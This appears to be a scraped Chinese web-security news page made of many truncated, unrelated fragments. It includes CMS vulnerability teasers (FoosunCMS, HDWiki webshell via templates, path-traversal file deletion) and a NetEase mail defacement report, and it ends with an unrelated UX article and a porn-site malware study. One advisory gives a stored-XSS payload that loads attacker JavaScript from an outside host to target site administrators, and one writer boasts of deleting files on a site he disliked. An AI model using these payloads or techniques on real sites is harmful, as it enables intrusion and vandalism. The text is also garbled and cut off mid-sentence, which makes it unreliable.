foosuncms是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。 漏洞分析:在文件\User\ GetPassword.asp中：ElseIf Request.Form("Action") = "step3" then //第28行 Call step3() …… Sub step3() //第19

app\groupbuy.app.php:26: function index()      {          $id = empty($_GET['id']) ? 0 : $

来源：马骏's bloghttp://zhidao.mail.163.com/zhidao/js/upload.jsfirebug或者开发人员工具 自己本地放个upload.js的修改版 用firebugs修改引入本地验证  很容易搞的  不成功的就是人品有问题了

7月3日中午,各大QQ群疯狂转载此消息,网易邮箱系统被入侵,入侵者留下了一个txt文档,文档内容为:

hacked by hacker

just a joke

http://mail.126.com/css/hack.txt

http://mail.163.com/hd/hack.txt

http://mail.188.com/hd/hack.txt

http://mail.yeah.net/css/hack.txt 

添加时间:2010-07-02 影响版本:FooSun > 5.0程序介绍:FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件。漏洞分析: 在文件\User\ GetPassword.asp中：ElseIf Request.Form("Action") = "step3" then //第28行Ca

 漏洞发现者:Sogili漏洞介绍:url-submit/index.php对提交的数据未过滤直接插入数据库,造成了储蓄性XSS漏洞测试方法：在网站名称那一栏填写<script src=http://www.sogili.com/exp.js></script>（src是填自己的js文件的地址,别跟我说那文件不存在）其它的符合要求就OK..然后提交..等待管理员查

 发现者：unknownman@t00ls发现时间：很久前了涉及系统：HDWiki所有版本漏洞描述：HDWiki采用了模板机制，模板编译后会保存到data/view目录下，为php文件，之后展现模板时又include之，导致可以拿webshell漏洞分析：漏洞代码在lib/template.class.php文件：         functio

只判断oldface 前面是否在目录下，没包括过滤 ../
但有验证  \.(jpg|gif|png)$  ，所以只能删除  jpg , gif ,png 类型的文件。
那天看那个站不爽，写个遍列删除的也爽YY了。

关于用户体验，我们常犯的9个错误Web 用户体验大师 Jacob Nielsen说过，“一个烂网站就像一个性情乖戾的推销员”，这样的推销员不仅无法说服顾客，而且让人生厌，就网站而言，再也没有什么比蹩脚的用户体验更让人沮丧的了。本文讲述了Web设计与开发中常犯的9个用户体验错误以及它们的解决方法.1.难以找到你感兴趣的内容下面这些知名站点不仅设计陈旧，而且易用性不佳

 研究发现，色情网站拥有的病毒数，是之前人们想象的五倍之多。海外研究人员自建了两个色情网站，通过观察网友们的各种行为，发现网友的特别容易犯错，即便是那些已知的危险。在浏览他们网站的49000抽样调查网友中，其中20000名网友电脑系统存在着漏洞。同时研究人员还分析了35000个色情网站，其中90%是免费的，但其中却有2.23%拥有木马程序。研究人员称，这些色情网站与存在漏洞的电脑交集在一